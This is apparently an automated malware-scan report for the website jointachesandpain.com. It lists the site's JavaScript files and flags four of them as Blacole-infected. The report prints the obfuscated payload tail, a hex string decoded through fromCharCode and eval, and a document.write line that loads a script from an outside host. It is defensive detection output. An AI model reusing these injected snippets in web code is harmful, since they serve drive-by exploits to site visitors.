New scan:

Malware Scanner report for jointachesandpain.com

Malicious/Suspicious/Total urls checked
4/1/27
5 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "jointachesandpain.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jointachesandpain.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://jointachesandpain.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:47 GMT
Location: http://www.jointachesandpain.com/
Server: Apache
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/
200 OK
Content-Length: 13436
Content-Type: text/html
clean
http://www.jointachesandpain.com/js/jquery.js
200 OK
Content-Length: 20257
Content-Type: application/javascript
clean
http://jointachesandpain.com/js/mobile.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:48 GMT
Location: http://www.jointachesandpain.com/js/mobile.js
Server: Apache
Content-Length: 324
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/js/mobile.js
404 Not Found
Content-Length: 437
Content-Type: text/html
clean
http://www.jointachesandpain.com/test404page.js
404 Not Found
Content-Length: 439
Content-Type: text/html
clean
http://jointachesandpain.com/js/form.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:50 GMT
Location: http://www.jointachesandpain.com/js/form.js
Server: Apache
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/js/form.js
200 OK
Content-Length: 15777
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a){function b(){var a="[jquery.form] "+Array.prototype.join.call(arguments,"");if(window.console&&window.console.log){window.console.log(a)}else if(window.opera&&window.opera.postError){window.opera.postError(a)}}a.fn.ajaxSubmit=function(c){function t(e){function C(c){if(o.aborted||B){return}try{z=w(n)}catch(d){b("cannot access response document: ",d);c=v}if(c===u&&o){o.abort("timeout");return}else if(c==v&&o){o.abort("server abort");return}if(!z||z.loca
... 3089 bytes are skipped ...
738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Antivirus reports:

AntiVir
JS/Blacole.EB.46
Avast
JS:Decode-AZW [Trj]
Ad-Aware
JS:Trojan.Script.CFX
Antiy-AVL
Trojan/JS.Iframe
Ikarus
Exploit.JS.Blacole
Rising
JS:Malware.JCrypto!1.9C0F
nProtect
JS:Trojan.Script.CFX
TrendMicro-HouseCall
JS_BLACOLE.SMTM
Comodo
Exploit.JS.Blacole.EZ
Emsisoft
JS:Trojan.Script.CFX (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
JS_BLACOLE.SMTM
Microsoft
Exploit:JS/Blacole.OL
Kaspersky
Trojan.JS.Iframe.agi
MicroWorld-eScan
JS:Trojan.Script.CFX
Fortinet
JS/Kryptik.CFX!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.cdoahu
F-Secure
JS:Trojan.Script.CFX
VIPRE
Trojan.JS.IFrame.afk (v)
AVG
JS/Exploit
Norman
Blacole.VX
GData
JS:Trojan.Script.CFX
Symantec
Trojan.Malscript
BitDefender
JS:Trojan.Script.CFX

http://jointachesandpain.com/js/jquery-1.6.2.min.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:50 GMT
Location: http://www.jointachesandpain.com/js/jquery-1.6.2.min.js
Server: Apache
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/js/jquery-1.6.2.min.js
200 OK
Content-Length: 61899
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.sabrinaneublum.com.br/kczhmcwd.php?id=1124124"></script>');

http://jointachesandpain.com/js/jquery.easing.1.3.min.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:52 GMT
Location: http://www.jointachesandpain.com/js/jquery.easing.1.3.min.js
Server: Apache
Content-Length: 339
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/js/jquery.easing.1.3.min.js
404 Not Found
Content-Length: 452
Content-Type: text/html
clean
http://jointachesandpain.com/js/royal-slider-7.9.min.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:52 GMT
Location: http://www.jointachesandpain.com/js/royal-slider-7.9.min.js
Server: Apache
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/js/royal-slider-7.9.min.js
200 OK
Content-Length: 26362
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a){function b(b,c){this.slider=a(b);this._az="";this._by="";this._cx="";var d=this;this.settings=a.extend({},a.fn.royalSlider.defaults,c);this.isSlideshowRunning=false;this._dw=false;this._ev=this.slider.find(".royalSlidesContainer");this._fu=this._ev.wrap('<div class="royalWrapper"/>').parent();this.slides=this._ev.find(".royalSlide");this._gt="<p class='royalPreloader'></p>";this._hs=false;this._ir=false;if("ontouchstart"in window){if(!this.settings.disableTranslate
... 3040 bytes are skipped ...
738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Antivirus reports:

AntiVir
JS/Blacole.EB.46
Avast
JS:Decode-AZW [Trj]
Ad-Aware
JS:Trojan.Script.CFX
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.Script.CFX
TrendMicro-HouseCall
TROJ_GEN.F47V1129
Emsisoft
JS:Trojan.Script.CFX (B)
Comodo
Exploit.JS.Blacole.EZ
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OL
Kaspersky
Trojan.JS.Iframe.agi
MicroWorld-eScan
JS:Trojan.Script.CFX
Fortinet
JS/Kryptik.CFX!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.cdoahu
F-Secure
JS:Trojan.Script.CFX
VIPRE
Trojan.JS.IFrame.afk (v)
AVG
JS/Exploit
Norman
Blacole.VX
GData
JS:Trojan.Script.CFX
Symantec
Trojan.Malscript
BitDefender
JS:Trojan.Script.CFX

http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js
200 OK
Content-Length: 91556
Content-Type: text/javascript
clean
http://jointachesandpain.com/minislides/js/freshline/jquery.freshline.boxer.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:54 GMT
Location: http://www.jointachesandpain.com/minislides/js/freshline/jquery.freshline.boxer.js
Server: Apache
Content-Length: 361
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/minislides/js/freshline/jquery.freshline.boxer.js
200 OK
Content-Length: 18454
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($,undefined){




$.fn.extend({


fhboxer: function(options) {



var defaults = {
hover_round:"false" };

options = $.extend({}, $.fn.fhboxer.defaults, options);


return this.each(function() {

var box = $(this);

box.wrap('<div class="item_lightbox_container"></div>');
var ilc=box.parent();
box.css(
... 3342 bytes are skipped ...
738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Antivirus reports:

AntiVir
JS/Blacole.EB.46
Avast
JS:Decode-AZW [Trj]
Ad-Aware
JS:Trojan.Script.CFX
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.Script.CFX
TrendMicro-HouseCall
JS_BLACOLE.SMTM
Comodo
Exploit.JS.Blacole.EZ
Emsisoft
JS:Trojan.Script.CFX (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
JS_BLACOLE.SMTM
Microsoft
Exploit:JS/Blacole.OL
Kaspersky
Trojan.JS.Iframe.agi
MicroWorld-eScan
JS:Trojan.Script.CFX
Fortinet
JS/Kryptik.CFX!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.cdoahu
F-Secure
JS:Trojan.Script.CFX
VIPRE
Trojan.JS.IFrame.afk (v)
AVG
JS/Exploit
Norman
Blacole.VX
GData
JS:Trojan.Script.CFX
Symantec
Trojan.Malscript
BitDefender
JS:Trojan.Script.CFX

http://jointachesandpain.com/minislides/js/freshline/jquery.freshline.minislides.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:54 GMT
Location: http://www.jointachesandpain.com/minislides/js/freshline/jquery.freshline.minislides.js
Server: Apache
Content-Length: 366
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/minislides/js/freshline/jquery.freshline.minislides.js
200 OK
Content-Length: 21453
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($,undefined){




$.fn.extend({


minislides: function(options) {



var defaults = {
width: 876, height: 300, slides:4, padding:20, shadow:0,
ease:'easeOutQuad',
speed:300,
hidetoolbar:0,
animtype:1, mousewheel:'off'
};

options = $.extend({}, $.fn.minislides.defaults, options);


return this.each(function() {
<
... 3388 bytes are skipped ...
738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Antivirus reports:

AntiVir
JS/Blacole.EB.46
Avast
JS:Decode-AZW [Trj]
Ad-Aware
JS:Trojan.Script.CFX
Ikarus
Trojan.JS.Agent
nProtect
JS:Trojan.Script.CFX
TrendMicro-HouseCall
JS_BLACOLE.SMTM
Comodo
Exploit.JS.Blacole.EZ
Emsisoft
JS:Trojan.Script.CFX (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
JS_BLACOLE.SMTM
Microsoft
Exploit:JS/Blacole.OL
Kaspersky
Trojan.JS.Iframe.agi
MicroWorld-eScan
JS:Trojan.Script.CFX
Fortinet
JS/Kryptik.CFX!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.cdoahu
F-Secure
JS:Trojan.Script.CFX
VIPRE
Trojan.JS.IFrame.afk (v)
AVG
JS/Exploit
Norman
Blacole.VX
GData
JS:Trojan.Script.CFX
Symantec
Trojan.Malscript
BitDefender
JS:Trojan.Script.CFX

http://jointachesandpain.com/minislides/js/jquery.touchwipe.min.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:55 GMT
Location: http://www.jointachesandpain.com/minislides/js/jquery.touchwipe.min.js
Server: Apache
Content-Length: 349
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/minislides/js/jquery.touchwipe.min.js
404 Not Found
Content-Length: 462
Content-Type: text/html
clean
http://jointachesandpain.com/minislides/js/jquery.easing.1.3.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:56 GMT
Location: http://www.jointachesandpain.com/minislides/js/jquery.easing.1.3.js
Server: Apache
Content-Length: 346
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/minislides/js/jquery.easing.1.3.js
404 Not Found
Content-Length: 459
Content-Type: text/html
clean
http://jointachesandpain.com/minislides/js/jquery.mousewheel.min.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:57 GMT
Location: http://www.jointachesandpain.com/minislides/js/jquery.mousewheel.min.js
Server: Apache
Content-Length: 350
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/minislides/js/jquery.mousewheel.min.js
404 Not Found
Content-Length: 463
Content-Type: text/html
clean
http://jointachesandpain.com/minislides/js/reflection.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:58 GMT
Location: http://www.jointachesandpain.com/minislides/js/reflection.js
Server: Apache
Content-Length: 339
Content-Type: text/html; charset=iso-8859-1
clean
http://www.jointachesandpain.com/minislides/js/reflection.js
404 Not Found
Content-Length: 452
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jointachesandpain.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 21:54:47 GMT
Location: http://www.jointachesandpain.com/
Server: Apache
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1

...312 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jointachesandpain.com
Referer: http://www.google.com/search?q=jointachesandpain.com

Result:
The result is similar to the first query. There are no suspicious redirects found.